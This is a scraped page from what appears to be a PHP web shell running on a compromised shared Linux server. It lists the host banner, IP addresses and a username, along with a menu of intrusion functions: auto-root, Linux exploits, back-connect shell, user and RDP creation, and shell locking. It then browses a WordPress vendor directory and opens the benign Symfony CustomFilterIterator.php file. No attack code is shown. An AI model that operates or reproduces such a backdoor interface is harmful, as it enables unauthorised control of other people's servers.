Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
symfony /
finder /
Iterator /
[ HOME SHELL ]
Name
Size
Permission
Action
CustomFilterIterator.php
1.48
KB
-rw-r--r--
DateRangeFilterIterator.php
1.41
KB
-rw-r--r--
DepthRangeFilterIterator.php
1.2
KB
-rw-r--r--
ExcludeDirectoryFilterIterator...
2.4
KB
-rw-r--r--
FileTypeFilterIterator.php
1.31
KB
-rw-r--r--
FilecontentFilterIterator.php
1.41
KB
-rw-r--r--
FilenameFilterIterator.php
1.15
KB
-rw-r--r--
FilterIterator.php
1.7
KB
-rw-r--r--
MultiplePcreFilterIterator.php
3.12
KB
-rw-r--r--
PathFilterIterator.php
1.42
KB
-rw-r--r--
RecursiveDirectoryIterator.php
4.54
KB
-rw-r--r--
SizeRangeFilterIterator.php
1.38
KB
-rw-r--r--
SortableIterator.php
2.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CustomFilterIterator.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Finder\Iterator; /** * CustomFilterIterator filters files by applying anonymous functions. * * The anonymous function receives a \SplFileInfo and must return false * to remove files. * * @author Fabien Potencier <fabien@symfony.com> */ class CustomFilterIterator extends FilterIterator { private $filters = []; /** * @param \Iterator $iterator The Iterator to filter * @param callable[] $filters An array of PHP callbacks * * @throws \InvalidArgumentException */ public function __construct(\Iterator $iterator, array $filters) { foreach ($filters as $filter) { if (!\is_callable($filter)) { throw new \InvalidArgumentException('Invalid PHP callback.'); } } $this->filters = $filters; parent::__construct($iterator); } /** * Filters the iterator values. * * @return bool true if the value should be kept, false otherwise */ public function accept() { $fileinfo = $this->current(); foreach ($this->filters as $filter) { if (false === \call_user_func($filter, $fileinfo)) { return false; } } return true; } }
Close